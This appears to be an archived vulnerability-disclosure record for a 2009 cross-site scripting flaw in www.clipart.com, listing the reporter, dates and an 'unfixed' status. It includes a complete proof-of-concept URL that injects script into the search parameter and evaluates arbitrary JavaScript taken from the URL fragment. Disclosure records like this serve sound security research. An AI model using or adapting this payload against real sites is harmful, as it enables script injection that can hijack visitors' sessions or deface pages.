Security researcher bho, has submitted on 20/04/2009 a cross-site-scripting (XSS) vulnerability affecting www.clipart.com, which at the time of submission ranked 9165 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 20/04/2009 |
Date published: 11/06/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: bho |
Domain: www.clipart.com |
Category: XSS |
Pagerank: 9165 |
URL: http://www.clipart.com/en/search/split?sub1=&orows=3&ocols=9&realign=&a=a&q=%3C/script%3E%3Cscript%3 Eeval(window.location.hash.substring(1))//&k_mode=all&k_exc=&q_color=1&q_bw=1&q_gif=1&q_jpeg=1&q_eps =1&q_wmf=1&q_psd=1&q_png=1&rows=3&srch=Search#alert(%27XSS%20by%20bho%27);%20document.body.innerHTML =%27XSS%20by%20bho%27; |
Click here to view the mirror
|
|
|